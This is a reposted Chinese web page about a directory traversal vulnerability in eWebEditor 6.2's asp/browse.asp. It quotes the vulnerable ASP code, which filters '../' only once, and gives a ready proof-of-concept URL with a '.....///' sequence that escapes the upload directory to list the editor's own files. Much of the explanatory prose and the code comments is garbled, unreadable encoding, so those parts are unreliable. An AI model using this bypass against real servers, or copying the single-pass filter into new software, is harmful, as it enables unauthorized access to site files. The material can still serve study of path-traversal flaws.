eWebEditor 6.2 目录遍历漏洞(asp/browse.asp)
番茄系统家园 · 2022-03-13 10:48:34
asp/browse.aspԴ:
ƴ:
Dim s_ReturnFlag, s_FolderType, s_Dir
Dim s_CurrDir
s_ReturnFlag = Trim(Request.QueryString("returnflag"))
s_FolderType = Trim(Request.QueryString("foldertype"))
s_Dir = Trim(Request("dir"))
Select Case s_FolderType
Case "upload"
s_CurrDir = sUploadDir
Case "shareimage"
sAllowExt = ""
s_CurrDir = sPathShareImage
Case "shareflash"
sAllowExt = ""
s_CurrDir = sPathShareFlash
Case "sharemedia"
sAllowExt = ""
s_CurrDir = sPathShareMedia
Case Else
s_FolderType = "shareother"
sAllowExt = ""
s_CurrDir = sPathShareOther
End Select
s_Dir = Replace(s_Dir, "\", "/")
'ǶĿ¼תĴ,©ڴ˴
s_Dir = Replace(s_Dir, "../", "") '滻../Ϊ
s_Dir = Replace(s_Dir, "./", "") '滻./Ϊ
If Left(s_Dir,1)="/" Then
s_Dir = ""
End If
Dim s_Dir2
s_Dir2 = Replace(s_Dir, "/", "\")
If s_Dir "" Then
If CheckValidDir(s_CurrDir & s_Dir2) = True Then
s_CurrDir = s_CurrDir & s_Dir2
Else
s_Dir = ""
End If
End If
.././йֹĿ¼ת,ͨĹ.ڼ滻ֻһοʹ....//ϼĿ¼,滻....//../
ʾ:
http://localhost/asp/browse.asp?action=file&type=file&dir=.....///DiaLog&style=full650&cusdir=&foldertype=upload&returnflag=span_upload
תeWebEditorDiaLogĿ¼,鿴ҳԴļ:
ƴ:
免责声明: 凡标注转载/编译字样内容并非本站原创,转载目的在于传递更多信息,并不代表本网赞同其观点和对其真实性负责。如果你觉得本文好,欢迎推荐给朋友阅读;本文链接: https://m.nndssk.com/wlaq/172495r4vABF.html。
